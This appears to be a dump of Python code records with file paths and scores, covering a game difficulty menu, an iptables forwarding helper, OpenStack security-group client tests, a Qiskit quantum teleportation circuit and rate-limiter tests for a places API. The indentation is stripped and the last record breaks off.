background.Children += self.SelectDifficultyBox
self.PopulateDifficultyBox()
def PopulateDifficultyBox(self):
mintitle = label(classes = ".miniTitle", text = "Select Difficulty")
self.SelectDifficultyBox.Children += mintitle
self.OptionsRadio = radio(classes = ".optionsRadio")
self.SelectDifficultyBox.Children += self.OptionsRadio
self.OptionsRadio.Children += label(text = "Beginner",classes = ".option .lvl1")
self.OptionsRadio.Children += label(text = "Novice",classes = ".option .lvl2")
self.OptionsRadio.Children += label(text = "Amateur",classes = ".option .lvl3")
self.OptionsRadio.Children += label(text = "Expert",classes = ".option .lvl4")
self.OptionsRadio.Children += label(text = "Impossible",classes = ".option .lvl5")
self.OptionsRadio.SelectedElement = self.OptionsRadio.Children[0]
startButton = label(text="Start", classes = ".startButton")
startButton.EventListeners += EventListener("<Button-1>", lambda e:self.NavigateTo("PlayGame"))
self.SelectDifficultyBox.Children += startButton
def NavigateTo(self, dest):
if dest == "MainMenu":
from ..MainMenu import MainMenu
self.Window.ChangeDocumentTo(MainMenu)
elif dest == "PlayGame":
self.SetSettings()
from .PlayGame import PlayGame
self.Window.ChangeDocumentTo(PlayGame)
def SetSettings(self):
difficulty = self.OptionsRadio.SelectedElement.Text
if difficulty == "Beginner":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Beginner'
elif difficulty == "Novice":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 40,
"DifficultySlope" : 0.01,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Novice'
elif difficulty == "Amateur":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0.1,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Amateur'
elif difficulty == "Expert":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0.1,
"BallCount" : 2,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Expert'
elif difficulty == "Impossible":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 40,
"DifficultySlope" : 0.01,
"BallCount" : 5,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Impossible' | 0.349422 | 0.064153 |
import subprocess
from pyroute2 import IPDB
def get_default_iface_name():
ip = IPDB()
interface_name = ip.interfaces[ip.routes['default']['oif']].get('ifname')
ip.release()
return interface_name
def iptables_version():
iptables_proc = subprocess.Popen(['iptables', '-L'], stderr=subprocess.PIPE, stdout=subprocess.DEVNULL)
text = iptables_proc.stderr.read()
if "Warning: iptables-legacy tables present, use iptables-legacy to see them" in str(text):
return 'iptables-nft'
else:
return 'iptables'
def iptables_create_syntropy_chain(version='-nft'):
try:
# Check if already exists, if not - create
subprocess.run([f'iptables{version}', '-N', 'SYNTROPY_CHAIN'], stderr=subprocess.DEVNULL)
subprocess.run(
[f'iptables{version}', '-C', 'FORWARD', '-s', '0.0.0.0/0', '-d', '0.0.0.0/0', '-j', 'SYNTROPY_CHAIN'],
check=True,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError:
subprocess.run(
[f'iptables{version}', '-I', 'FORWARD', '-s', '0.0.0.0/0', '-d', '0.0.0.0/0', '-j', 'SYNTROPY_CHAIN'],
stderr=subprocess.DEVNULL,
check=False
)
if version == '-nft':
iptables_create_syntropy_chain(version='-legacy')
def add_iptable_rules(ips: list, version='-nft'):
for ip in ips:
try:
# Check if already exists, if not - create
subprocess.run(
[f'iptables{version}', '-C', 'SYNTROPY_CHAIN', '-p', 'all', '-s', ip, '-j', 'ACCEPT'],
check=True,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError:
subprocess.run(
[f'iptables{version}', '-A', 'SYNTROPY_CHAIN', '-p', 'all', '-s', ip, '-j', 'ACCEPT'],
check=False,
stderr=subprocess.DEVNULL
)
if version == '-nft':
add_iptable_rules(ips, version='-legacy')
def delete_iptable_rules(ips: list, version='-nft'):
for ip in ips:
subprocess.run(
[f'iptables{version}', '-D', 'FORWARD', '-p', 'all', '-s', ip, '-j', 'ACCEPT'],
check=False,
stderr=subprocess.DEVNULL
)
if version == '-nft':
delete_iptable_rules(ips, version='-legacy')
def add_iptables_forward(ifname, version='-nft'):
try:
# Check if already exists, if not - create
subprocess.run(
[f'iptables{version}', '-C', 'FORWARD', '-i', ifname, '-j', 'ACCEPT'],
check=True,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError:
subprocess.run(
[f'iptables{version}', '-A', 'FORWARD', '-i', ifname, '-j', 'ACCEPT'],
check=False,
stderr=subprocess.DEVNULL
)
subprocess.run(
[f'iptables{version}', '-t', 'nat', '-A', 'POSTROUTING', '-o', get_default_iface_name(), '-j', 'MASQUERADE'],
check=False,
stderr=subprocess.DEVNULL
)
if version == '-nft':
add_iptables_forward(ifname, version='-legacy') | platform_agent/cmd/iptables.py | import subprocess
from pyroute2 import IPDB
def get_default_iface_name():
ip = IPDB()
interface_name = ip.interfaces[ip.routes['default']['oif']].get('ifname')
ip.release()
return interface_name
def iptables_version():
iptables_proc = subprocess.Popen(['iptables', '-L'], stderr=subprocess.PIPE, stdout=subprocess.DEVNULL)
text = iptables_proc.stderr.read()
if "Warning: iptables-legacy tables present, use iptables-legacy to see them" in str(text):
return 'iptables-nft'
else:
return 'iptables'
def iptables_create_syntropy_chain(version='-nft'):
try:
# Check if already exists, if not - create
subprocess.run([f'iptables{version}', '-N', 'SYNTROPY_CHAIN'], stderr=subprocess.DEVNULL)
subprocess.run(
[f'iptables{version}', '-C', 'FORWARD', '-s', '0.0.0.0/0', '-d', '0.0.0.0/0', '-j', 'SYNTROPY_CHAIN'],
check=True,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError:
subprocess.run(
[f'iptables{version}', '-I', 'FORWARD', '-s', '0.0.0.0/0', '-d', '0.0.0.0/0', '-j', 'SYNTROPY_CHAIN'],
stderr=subprocess.DEVNULL,
check=False
)
if version == '-nft':
iptables_create_syntropy_chain(version='-legacy')
def add_iptable_rules(ips: list, version='-nft'):
for ip in ips:
try:
# Check if already exists, if not - create
subprocess.run(
[f'iptables{version}', '-C', 'SYNTROPY_CHAIN', '-p', 'all', '-s', ip, '-j', 'ACCEPT'],
check=True,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError:
subprocess.run(
[f'iptables{version}', '-A', 'SYNTROPY_CHAIN', '-p', 'all', '-s', ip, '-j', 'ACCEPT'],
check=False,
stderr=subprocess.DEVNULL
)
if version == '-nft':
add_iptable_rules(ips, version='-legacy')
def delete_iptable_rules(ips: list, version='-nft'):
for ip in ips:
subprocess.run(
[f'iptables{version}', '-D', 'FORWARD', '-p', 'all', '-s', ip, '-j', 'ACCEPT'],
check=False,
stderr=subprocess.DEVNULL
)
if version == '-nft':
delete_iptable_rules(ips, version='-legacy')
def add_iptables_forward(ifname, version='-nft'):
try:
# Check if already exists, if not - create
subprocess.run(
[f'iptables{version}', '-C', 'FORWARD', '-i', ifname, '-j', 'ACCEPT'],
check=True,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError:
subprocess.run(
[f'iptables{version}', '-A', 'FORWARD', '-i', ifname, '-j', 'ACCEPT'],
check=False,
stderr=subprocess.DEVNULL
)
subprocess.run(
[f'iptables{version}', '-t', 'nat', '-A', 'POSTROUTING', '-o', get_default_iface_name(), '-j', 'MASQUERADE'],
check=False,
stderr=subprocess.DEVNULL
)
if version == '-nft':
add_iptables_forward(ifname, version='-legacy') | 0.206494 | 0.067547 |
from oslotest import mockpatch
from tempest.lib import exceptions as lib_exc
from tempest.lib.services.compute import security_groups_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services.compute import base
class TestSecurityGroupsClient(base.BaseComputeServiceTest):
FAKE_SECURITY_GROUP_INFO = [{
"description": "default",
"id": "3fb26eb3-581b-4420-9963-b0879a026506",
"name": "default",
"rules": [],
"tenant_id": "openstack"
}]
def setUp(self):
super(TestSecurityGroupsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = security_groups_client.SecurityGroupsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_security_groups(self, bytes_body=False):
self.check_service_client_function(
self.client.list_security_groups,
'tempest.lib.common.rest_client.RestClient.get',
{"security_groups": self.FAKE_SECURITY_GROUP_INFO},
to_utf=bytes_body)
def test_list_security_groups_with_str_body(self):
self._test_list_security_groups()
def test_list_security_groups_with_bytes_body(self):
self._test_list_security_groups(bytes_body=True)
def _test_show_security_group(self, bytes_body=False):
self.check_service_client_function(
self.client.show_security_group,
'tempest.lib.common.rest_client.RestClient.get',
{"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
to_utf=bytes_body,
security_group_id='fake-id')
def test_show_security_group_with_str_body(self):
self._test_show_security_group()
def test_show_security_group_with_bytes_body(self):
self._test_show_security_group(bytes_body=True)
def _test_create_security_group(self, bytes_body=False):
post_body = {"name": "test", "description": "test_group"}
self.check_service_client_function(
self.client.create_security_group,
'tempest.lib.common.rest_client.RestClient.post',
{"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
to_utf=bytes_body,
kwargs=post_body)
def test_create_security_group_with_str_body(self):
self._test_create_security_group()
def test_create_security_group_with_bytes_body(self):
self._test_create_security_group(bytes_body=True)
def _test_update_security_group(self, bytes_body=False):
req_body = {"name": "test", "description": "test_group"}
self.check_service_client_function(
self.client.update_security_group,
'tempest.lib.common.rest_client.RestClient.put',
{"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
to_utf=bytes_body,
security_group_id='fake-id',
kwargs=req_body)
def test_update_security_group_with_str_body(self):
self._test_update_security_group()
def test_update_security_group_with_bytes_body(self):
self._test_update_security_group(bytes_body=True)
def test_delete_security_group(self):
self.check_service_client_function(
self.client.delete_security_group,
'tempest.lib.common.rest_client.RestClient.delete',
{}, status=202, security_group_id='fake-id')
def test_is_resource_deleted_true(self):
mod = ('tempest.lib.services.compute.security_groups_client.'
'SecurityGroupsClient.show_security_group')
self.useFixture(mockpatch.Patch(mod, side_effect=lib_exc.NotFound))
self.assertTrue(self.client.is_resource_deleted('fake-id'))
def test_is_resource_deleted_false(self):
mod = ('tempest.lib.services.compute.security_groups_client.'
'SecurityGroupsClient.show_security_group')
self.useFixture(mockpatch.Patch(mod, return_value='success'))
self.assertFalse(self.client.is_resource_deleted('fake-id')) | tempest/tests/lib/services/compute/test_security_groups_client.py |
from oslotest import mockpatch
from tempest.lib import exceptions as lib_exc
from tempest.lib.services.compute import security_groups_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services.compute import base
class TestSecurityGroupsClient(base.BaseComputeServiceTest):
FAKE_SECURITY_GROUP_INFO = [{
"description": "default",
"id": "3fb26eb3-581b-4420-9963-b0879a026506",
"name": "default",
"rules": [],
"tenant_id": "openstack"
}]
def setUp(self):
super(TestSecurityGroupsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = security_groups_client.SecurityGroupsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_security_groups(self, bytes_body=False):
self.check_service_client_function(
self.client.list_security_groups,
'tempest.lib.common.rest_client.RestClient.get',
{"security_groups": self.FAKE_SECURITY_GROUP_INFO},
to_utf=bytes_body)
def test_list_security_groups_with_str_body(self):
self._test_list_security_groups()
def test_list_security_groups_with_bytes_body(self):
self._test_list_security_groups(bytes_body=True)
def _test_show_security_group(self, bytes_body=False):
self.check_service_client_function(
self.client.show_security_group,
'tempest.lib.common.rest_client.RestClient.get',
{"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
to_utf=bytes_body,
security_group_id='fake-id')
def test_show_security_group_with_str_body(self):
self._test_show_security_group()
def test_show_security_group_with_bytes_body(self):
self._test_show_security_group(bytes_body=True)
def _test_create_security_group(self, bytes_body=False):
post_body = {"name": "test", "description": "test_group"}
self.check_service_client_function(
self.client.create_security_group,
'tempest.lib.common.rest_client.RestClient.post',
{"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
to_utf=bytes_body,
kwargs=post_body)
def test_create_security_group_with_str_body(self):
self._test_create_security_group()
def test_create_security_group_with_bytes_body(self):
self._test_create_security_group(bytes_body=True)
def _test_update_security_group(self, bytes_body=False):
req_body = {"name": "test", "description": "test_group"}
self.check_service_client_function(
self.client.update_security_group,
'tempest.lib.common.rest_client.RestClient.put',
{"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
to_utf=bytes_body,
security_group_id='fake-id',
kwargs=req_body)
def test_update_security_group_with_str_body(self):
self._test_update_security_group()
def test_update_security_group_with_bytes_body(self):
self._test_update_security_group(bytes_body=True)
def test_delete_security_group(self):
self.check_service_client_function(
self.client.delete_security_group,
'tempest.lib.common.rest_client.RestClient.delete',
{}, status=202, security_group_id='fake-id')
def test_is_resource_deleted_true(self):
mod = ('tempest.lib.services.compute.security_groups_client.'
'SecurityGroupsClient.show_security_group')
self.useFixture(mockpatch.Patch(mod, side_effect=lib_exc.NotFound))
self.assertTrue(self.client.is_resource_deleted('fake-id'))
def test_is_resource_deleted_false(self):
mod = ('tempest.lib.services.compute.security_groups_client.'
'SecurityGroupsClient.show_security_group')
self.useFixture(mockpatch.Patch(mod, return_value='success'))
self.assertFalse(self.client.is_resource_deleted('fake-id')) | 0.510985 | 0.188137 |
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
class QT:
"""
Generate an instance of the Quantum Teleportation Protocol.
Attributes
----------
msg : List of Statevectors
The strand of 1-qubit state vectors that is intended to be sent
barriers : bool
Choice to include barriers in circuit or not
measure : bool
Choice to measure the teleported qubit at the end or not
qrname : string
Name of quantum registers
crname : string
Name of classical register holding all teleported bits
circ : QuantumCircuit
Qiskit QuantumCircuit that represents the circuit
"""
def __init__(self, msg=None, barriers=True, measure=True, qrname=None, crname=None):
if msg is None:
raise Exception('Provide list of Statevectors for the Teleportation circuit')
self.msg = msg
# Set flags for circuit generation
self.nq = len(msg)
self.barriers = barriers
self.measure = measure
# Set up the registers and the circuit
num_qr = 3*self.nq
num_cr = 2*self.nq
if qrname is None:
self.qr = QuantumRegister(num_qr, name="q")
else:
self.qr = QuantumRegister(num_qr, name=qrname)
self.circ = QuantumCircuit(self.qr)
self.cr = []
for i in range(num_cr):
self.cr.append(ClassicalRegister(1))
self.circ.add_register(self.cr[i])
if crname is None:
self.circ.add_register(ClassicalRegister(self.nq, name="output"))
else:
self.circ.add_register(ClassicalRegister(self.nq, name=crname))
def _create_bell_pair(self, a, b):
"""
Creates a bell pair
Inputs
------
a : int
Left most qubit position
b : int
Right most qubit position
"""
self.circ.h(a)
self.circ.cx(a, b)
def _bell_state_measurement(self, psi, a):
"""
Performs a bell state measurement using psi and a qubit indices
Inputs
------
psi : int
The index of the qubit that the messenger would like to send
a : int
The index of the qubit that is entangled with the receiver's
"""
self.circ.cx(psi, a)
self.circ.h(psi)
def _prepare_cbits(self, q1, q2, c1, c2):
"""
Measures qubits q1 & q2 on classical registers c1 & c2
Inputs
------
q1 : int
The index of one qubit to measure
q2 : int
The index of a second qubit to measure
c1 : int
The index of the classical register for q1
c2 : int
The index of the classical register for q2
"""
self.circ.measure(q1, c1)
self.circ.measure(q2, c2)
def _decode(self, qubit, c1, c2):
"""
Receiver applies gates depending on the classical bits received
Inputs
------
qubit : int
The index of the qubit that will receive the teleported qubit
c1 : ClassicalRegister
The first classical register to be read from
c2 : ClassicalRegister
The second classical register to be read from
"""
self.circ.x(qubit).c_if(c2, 1)
self.circ.z(qubit).c_if(c1, 1)
def gen_circuit(self):
"""
Create a circuit implementing the Quantum Teleportation protocol
Returns
-------
QuantumCircuit
QuatumCircuit object of size nq
"""
# Initialize the qubit to be teleported
# Create bell pairs
for i in range(self.nq):
self.circ.initialize(self.msg[i].data, 3*i)
self._create_bell_pair(3*i+1, 3*i+2)
if (self.barriers):
self.circ.barrier([3*i, 3*i+1, 3*i+2])
# q1 is sent to messenger and q2 goes to receiver
# Messenger perform bell state measurements
for i in range(self.nq):
self._bell_state_measurement(3*i, 3*i+1)
if (self.barriers):
self.circ.barrier([3*i, 3*i+1, 3*i+2])
# Messenger prepares their classical bits to send
for i in range(self.nq):
self._prepare_cbits(3*i, 3*i+1, self.cr[2*i], self.cr[2*i+1])
if (self.barriers):
self.circ.barrier([3*i, 3*i+1, 3*i+2])
# Messenger sends resulting 2 classical bits to receiver
# Receiver applies certain gate(s) given classical bits' information
for i in range(self.nq):
self._decode(3*i+2, self.cr[2*i], self.cr[2*i+1])
# Receiver then measures (if the goal is for a product state)
if (self.measure):
for i in range(self.nq):
self.circ.measure(3*i+2, 3*self.nq-i-1)
return self.circ | QT/quantum_teleportation.py | from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
class QT:
"""
Generate an instance of the Quantum Teleportation Protocol.
Attributes
----------
msg : List of Statevectors
The strand of 1-qubit state vectors that is intended to be sent
barriers : bool
Choice to include barriers in circuit or not
measure : bool
Choice to measure the teleported qubit at the end or not
qrname : string
Name of quantum registers
crname : string
Name of classical register holding all teleported bits
circ : QuantumCircuit
Qiskit QuantumCircuit that represents the circuit
"""
def __init__(self, msg=None, barriers=True, measure=True, qrname=None, crname=None):
if msg is None:
raise Exception('Provide list of Statevectors for the Teleportation circuit')
self.msg = msg
# Set flags for circuit generation
self.nq = len(msg)
self.barriers = barriers
self.measure = measure
# Set up the registers and the circuit
num_qr = 3*self.nq
num_cr = 2*self.nq
if qrname is None:
self.qr = QuantumRegister(num_qr, name="q")
else:
self.qr = QuantumRegister(num_qr, name=qrname)
self.circ = QuantumCircuit(self.qr)
self.cr = []
for i in range(num_cr):
self.cr.append(ClassicalRegister(1))
self.circ.add_register(self.cr[i])
if crname is None:
self.circ.add_register(ClassicalRegister(self.nq, name="output"))
else:
self.circ.add_register(ClassicalRegister(self.nq, name=crname))
def _create_bell_pair(self, a, b):
"""
Creates a bell pair
Inputs
------
a : int
Left most qubit position
b : int
Right most qubit position
"""
self.circ.h(a)
self.circ.cx(a, b)
def _bell_state_measurement(self, psi, a):
"""
Performs a bell state measurement using psi and a qubit indices
Inputs
------
psi : int
The index of the qubit that the messenger would like to send
a : int
The index of the qubit that is entangled with the receiver's
"""
self.circ.cx(psi, a)
self.circ.h(psi)
def _prepare_cbits(self, q1, q2, c1, c2):
"""
Measures qubits q1 & q2 on classical registers c1 & c2
Inputs
------
q1 : int
The index of one qubit to measure
q2 : int
The index of a second qubit to measure
c1 : int
The index of the classical register for q1
c2 : int
The index of the classical register for q2
"""
self.circ.measure(q1, c1)
self.circ.measure(q2, c2)
def _decode(self, qubit, c1, c2):
"""
Receiver applies gates depending on the classical bits received
Inputs
------
qubit : int
The index of the qubit that will receive the teleported qubit
c1 : ClassicalRegister
The first classical register to be read from
c2 : ClassicalRegister
The second classical register to be read from
"""
self.circ.x(qubit).c_if(c2, 1)
self.circ.z(qubit).c_if(c1, 1)
def gen_circuit(self):
"""
Create a circuit implementing the Quantum Teleportation protocol
Returns
-------
QuantumCircuit
QuatumCircuit object of size nq
"""
# Initialize the qubit to be teleported
# Create bell pairs
for i in range(self.nq):
self.circ.initialize(self.msg[i].data, 3*i)
self._create_bell_pair(3*i+1, 3*i+2)
if (self.barriers):
self.circ.barrier([3*i, 3*i+1, 3*i+2])
# q1 is sent to messenger and q2 goes to receiver
# Messenger perform bell state measurements
for i in range(self.nq):
self._bell_state_measurement(3*i, 3*i+1)
if (self.barriers):
self.circ.barrier([3*i, 3*i+1, 3*i+2])
# Messenger prepares their classical bits to send
for i in range(self.nq):
self._prepare_cbits(3*i, 3*i+1, self.cr[2*i], self.cr[2*i+1])
if (self.barriers):
self.circ.barrier([3*i, 3*i+1, 3*i+2])
# Messenger sends resulting 2 classical bits to receiver
# Receiver applies certain gate(s) given classical bits' information
for i in range(self.nq):
self._decode(3*i+2, self.cr[2*i], self.cr[2*i+1])
# Receiver then measures (if the goal is for a product state)
if (self.measure):
for i in range(self.nq):
self.circ.measure(3*i+2, 3*self.nq-i-1)
return self.circ | 0.865437 | 0.730855 |
import responses
import pytest
import re
from freezegun import freeze_time
from app import app, settings
from fastapi.testclient import TestClient
from idunn.datasources.wikipedia import WikipediaSession
from idunn.utils.redis import RedisWrapper
from .utils import override_settings
from .test_api_with_wiki import mock_wikipedia_response
from .test_cache import has_wiki_desc
from redis import RedisError
from redis_rate_limit import RateLimiter
from functools import wraps
@pytest.fixture(scope="function")
def disable_redis():
try:
RedisWrapper.disable()
yield
finally:
RedisWrapper.enable()
@pytest.fixture(scope="function")
def limiter_test_normal(redis, disable_redis):
"""
We define here settings specific to tests.
We define low max calls limits to avoid
too large number of requests made
"""
with override_settings(
{"WIKI_API_RL_PERIOD": 5, "WIKI_API_RL_MAX_CALLS": 6, "REDIS_URL": redis}
):
# To force settings overriding we need to set to None the limiter
WikipediaSession.Helpers._rate_limiter = None
yield
# We reset the rate limiter to remove the context of previous test
WikipediaSession.Helpers._rate_limiter = None
@pytest.fixture(scope="function")
def limiter_test_interruption(redis, disable_redis):
"""
In the 'Redis interruption' test below
we made more requests than the limits
allowed by the fixture 'limiter_test_normal'
So we need another specific fixture.
"""
with override_settings(
{"WIKI_API_RL_PERIOD": 5, "WIKI_API_RL_MAX_CALLS": 100, "REDIS_URL": redis}
):
WikipediaSession.Helpers._rate_limiter = None
yield
WikipediaSession.Helpers._rate_limiter = None
def test_rate_limiter_with_redis(limiter_test_normal, mock_wikipedia_response):
"""
Test that Idunn stops external requests when
we are above the max rate
Each call to Idunn (with cache disabled) outputs a block with Wikipedia
data, which requires 2 requests to build (to translate the title and then to
fetch actual content).
As `WIKI_API_RL_MAX_CALLS` is set to 6, the blocks won't be displayed
after the 3rd request.
"""
client = TestClient(app)
for _ in range(3):
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
resp = response.json()
assert has_wiki_desc(resp)
for _ in range(2):
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
resp = response.json()
assert not has_wiki_desc(resp)
assert len(mock_wikipedia_response.calls) == 6
def test_rate_limiter_without_redis(disable_redis):
"""
Test that Idunn doesn't stop external requests when
no redis has been set: 10 requests to Idunn should
generate 20 requests to Wikipedia API
"""
client = TestClient(app)
with responses.RequestsMock() as rsps:
rsps.add(
"GET", re.compile(r"^https://.*\.wikipedia.org/"), status=200, json={"test": "test"}
)
for _ in range(10):
client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert len(rsps.calls) == 10
def restart_wiki_redis(docker_services):
"""
Because docker services ports are
dynamically chosen when the service starts
we have to get the new port of the service.
"""
docker_services.start("wiki_redis")
# We have to remove the previous port of the redis service which has been
# stored in the dict '_services' before to get the new one.
del docker_services._services["wiki_redis"]
port = docker_services.port_for("wiki_redis", 6379)
url = f"{docker_services.docker_ip}:{port}"
settings._settings["REDIS_URL"] = url
WikipediaSession.Helpers._rate_limiter = None
def test_rate_limiter_with_redisError(
limiter_test_interruption, mock_wikipedia_response, monkeypatch
):
"""
Test that Idunn stops returning the wikipedia block
when not enough space remains on the disk for the redis
database used by the limiter.
Also when the redis service comes back, Idunn should returns
the wikipedia block again.
"""
client = TestClient(app)
# First we make a successful call before "stopping" redis.
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# Here the redis is on so the answer should contain the wikipedia block.
assert has_wiki_desc(resp)
with monkeypatch.context() as m:
@wraps(RateLimiter.limit)
def fake_limit(*args, **kwargs):
"""
Raises a RedisError to simulate a lack of
space on the disk
"""
raise RedisError
# Now we substitute the limit function with our fake_limit.
m.setattr(RateLimiter, "limit", fake_limit)
client = TestClient(app)
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# No wikipedia block should be in the answer.
assert not has_wiki_desc(resp)
# Now that the redis "came back", we are expecting a correct answer from
# Idunn.
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# Here the redis is on so the answer should contain the wikipedia block
assert has_wiki_desc(resp)
@freeze_time("2018-06-14 8:30:00", tz_offset=2)
def test_rate_limiter_with_redis_interruption(
docker_services, mock_wikipedia_response, limiter_test_interruption
):
"""
Test that Idunn isn't impacted by any Redis interruption:
If Redis service stops then the wikipedia block should not be returned.
And when Redis restarts the wikipedia block should be returned again
This test has 3 steps:
* A: redis is up: we have the wiki block
* B: redis is down: no wiki block
* C: redis is up again: we have the wiki block again
"""
client = TestClient(app)
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# A - Before Redis interruption we check the answer is correct
assert resp["id"] == "osm:relation:7515426"
assert resp["name"] == "Museo del Louvre"
assert resp["local_name"] == "Musée du Louvre"
assert resp["class_name"] == "museum"
assert resp["subclass_name"] == "museum"
assert resp["blocks"][4] == {
"type": "description",
"description": "El Museo del Louvre es el museo nacional de Francia ...",
"source": "wikipedia",
"url": "https://es.wikipedia.org/wiki/Museo_del_Louvre",
}
# B - We interrupt the Redis service and we make a new Idunn request
docker_services._docker_compose.execute("stop", "wiki_redis")
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
# The wikipedia block should not be returned: we check we have all the
# information, except the wikipedia block.
resp = response.json()
assert resp["id"] == "osm:relation:7515426"
assert resp["name"] == "Museo del Louvre"
assert resp["local_name"] == "Musée du Louvre"
assert resp["class_name"] == "museum"
assert resp["subclass_name"] == "museum"
assert not has_wiki_desc(resp)
# C - When Redis service restarts the wikipedia block should be returned again.
restart_wiki_redis(docker_services)
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
assert resp["id"] == "osm:relation:7515426"
assert resp["name"] == "Museo del Louvre"
assert resp["local_name"] == "Musée du Louvre"
assert resp["class_name"] == "museum"
assert resp["subclass_name"] == "museum"
assert resp["blocks"][4] == {
"type": "description",
"description": "El Museo del Louvre es el museo nacional de Francia ...",
"source": "wikipedia",
"url": "https://es.wikipedia.org/wiki/Museo_del_Louvre",
} | tests/test_rate_limiter.py | import responses
import pytest
import re
from freezegun import freeze_time
from app import app, settings
from fastapi.testclient import TestClient
from idunn.datasources.wikipedia import WikipediaSession
from idunn.utils.redis import RedisWrapper
from .utils import override_settings
from .test_api_with_wiki import mock_wikipedia_response
from .test_cache import has_wiki_desc
from redis import RedisError
from redis_rate_limit import RateLimiter
from functools import wraps
@pytest.fixture(scope="function")
def disable_redis():
try:
RedisWrapper.disable()
yield
finally:
RedisWrapper.enable()
@pytest.fixture(scope="function")
def limiter_test_normal(redis, disable_redis):
"""
We define here settings specific to tests.
We define low max calls limits to avoid
too large number of requests made
"""
with override_settings(
{"WIKI_API_RL_PERIOD": 5, "WIKI_API_RL_MAX_CALLS": 6, "REDIS_URL": redis}
):
# To force settings overriding we need to set to None the limiter
WikipediaSession.Helpers._rate_limiter = None
yield
# We reset the rate limiter to remove the context of previous test
WikipediaSession.Helpers._rate_limiter = None
@pytest.fixture(scope="function")
def limiter_test_interruption(redis, disable_redis):
"""
In the 'Redis interruption' test below
we made more requests than the limits
allowed by the fixture 'limiter_test_normal'
So we need another specific fixture.
"""
with override_settings(
{"WIKI_API_RL_PERIOD": 5, "WIKI_API_RL_MAX_CALLS": 100, "REDIS_URL": redis}
):
WikipediaSession.Helpers._rate_limiter = None
yield
WikipediaSession.Helpers._rate_limiter = None
def test_rate_limiter_with_redis(limiter_test_normal, mock_wikipedia_response):
"""
Test that Idunn stops external requests when
we are above the max rate
Each call to Idunn (with cache disabled) outputs a block with Wikipedia
data, which requires 2 requests to build (to translate the title and then to
fetch actual content).
As `WIKI_API_RL_MAX_CALLS` is set to 6, the blocks won't be displayed
after the 3rd request.
"""
client = TestClient(app)
for _ in range(3):
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
resp = response.json()
assert has_wiki_desc(resp)
for _ in range(2):
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
resp = response.json()
assert not has_wiki_desc(resp)
assert len(mock_wikipedia_response.calls) == 6
def test_rate_limiter_without_redis(disable_redis):
"""
Test that Idunn doesn't stop external requests when
no redis has been set: 10 requests to Idunn should
generate 20 requests to Wikipedia API
"""
client = TestClient(app)
with responses.RequestsMock() as rsps:
rsps.add(
"GET", re.compile(r"^https://.*\.wikipedia.org/"), status=200, json={"test": "test"}
)
for _ in range(10):
client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert len(rsps.calls) == 10
def restart_wiki_redis(docker_services):
"""
Because docker services ports are
dynamically chosen when the service starts
we have to get the new port of the service.
"""
docker_services.start("wiki_redis")
# We have to remove the previous port of the redis service which has been
# stored in the dict '_services' before to get the new one.
del docker_services._services["wiki_redis"]
port = docker_services.port_for("wiki_redis", 6379)
url = f"{docker_services.docker_ip}:{port}"
settings._settings["REDIS_URL"] = url
WikipediaSession.Helpers._rate_limiter = None
def test_rate_limiter_with_redisError(
limiter_test_interruption, mock_wikipedia_response, monkeypatch
):
"""
Test that Idunn stops returning the wikipedia block
when not enough space remains on the disk for the redis
database used by the limiter.
Also when the redis service comes back, Idunn should returns
the wikipedia block again.
"""
client = TestClient(app)
# First we make a successful call before "stopping" redis.
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# Here the redis is on so the answer should contain the wikipedia block.
assert has_wiki_desc(resp)
